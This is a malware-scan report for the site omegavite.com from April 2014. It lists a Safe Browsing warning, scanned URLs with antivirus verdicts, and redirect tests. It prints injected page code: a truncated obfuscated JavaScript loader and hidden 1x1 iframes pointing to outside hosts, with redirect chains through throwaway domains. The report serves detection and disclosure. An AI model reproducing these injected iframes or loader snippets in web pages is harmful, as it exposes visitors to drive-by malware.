Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=omegavite.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.omegavite.com/ | 200 OK Content-Length: 13234 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var date=new Date();function lols(){return true} window.onerror=lols;function getXmlHttp(){var xmlhttp;try{xmlhttp=new ActiveXObject('Msxml2.XMLHTTP');}catch(e){try{xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');}catch(e){xmlhttp=false;}} if(!xmlhttp&&typeof XMLHttpRequest!='undefined'){xmlhttp=new XMLHttpRequest();} return xmlhttp;} v=32;date=new Date();try{var req=getXmlHttp();req.onreadystatechange=function(){if(req.readySta ...[3829 bytes skipped]... Antivirus reports:
Hidden iFrame found. The same iFrame was found in 10 websites. size: 1x1 src: http://top-google.in/vb/ <iframe width="1" height="1" frameborder="0" scrolling="no" src="http://top-google.in/vb/"> Hidden iFrame found. size: 1x1 src: http://stat-mail.in/js/ <iframe width="1" height="1" frameborder="0" scrolling="no" src="http://stat-mail.in/js/"> | ||
http://news-cmps.cz.cc/media.js | HTTP/1.1 302 Found Connection: close Date: Tue, 22 Apr 2014 20:07:53 GMT Location: http://p.r.im Server: Apache/2.4.6 (Linux/SUSE) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | clean |
http://p.r.im/ | 200 OK Content-Length: 2847 Content-Type: text/html | clean |
http://p.r.im/ignition-current.min.js | 200 OK Content-Length: 145668 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) "object"!==typeof JSON&&(JSON={}); (function(){function e(f){return 10>f?"0"+f:f}function f(f){s.lastIndex=0;return s.test(f)?'"'+f.replace(s,function(f){var e=j[f];return"string"===typeof e?e:"\\u"+("0000"+f.charCodeAt(0).toString(16)).slice(-4)})+'"':'"'+f+'"'}function p(e,j){var l,B,q,s,Z=t,L,x=j[e];x&&("object"===typeof x&&"function"===typeof x.toJSON)&&(x=x.toJSON(e));"function"===typeof m&&(x=m.call(j,e,x));switch(typeof x){case "string":retur $.each(f,function(e,f){p(f)});e.empty()}})};window.IgnitionInstance=e;$("#lr-widget").each(function(){var f={};$(this).attr("rel")?f.site_id=$(this).attr("rel"):f.domain=window.location.hostname;$(this).attr("data-unlaunched")&&(f.useUnlaunchedInfo=!0);var j=new e($(this),f);j.initLive(function(){window.lrInitCallback&&window.lrInitCallback(j,this)});window.lrIgnition=j})})}(); Antivirus reports:
| ||
http://news-cmps.cz.cc/test404page.js | HTTP/1.1 302 Found Connection: close Date: Tue, 22 Apr 2014 20:07:55 GMT Location: http://p.r.im Server: Apache/2.4.6 (Linux/SUSE) Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | clean |
http://p.r.im/test404page.js | 404 Not Found Content-Length: 1400 Content-Type: text/html | clean |
http://we-faw.cz.cc/media.js | HTTP/1.1 302 Found Connection: close Date: Tue, 22 Apr 2014 20:07:57 GMT Location: http://p.r.im Server: Apache/2.4.6 (Linux/SUSE) Content-Length: 278 Content-Type: text/html; charset=iso-8859-1 | clean |
http://smartbucks.ru/javascript/promo/global.js | 200 OK Content-Length: 2845 Content-Type: application/x-javascript | clean |
http://smartbucks.ru/javascript/promo/popunder.js | 200 OK Content-Length: 817 Content-Type: application/x-javascript | clean |
http://www.reconstructing.me/is.js | 200 OK Content-Length: 329 Content-Type: text/html | clean |
http://mondodesign.ro/sll/is.js | 404 Not Found Content-Length: 2207 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: omegavite.com
Result:
GET / HTTP/1.1
Host: omegavite.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: omegavite.com
Referer: http://www.google.com/search?q=omegavite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: omegavite.com
Referer: http://www.google.com/search?q=omegavite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.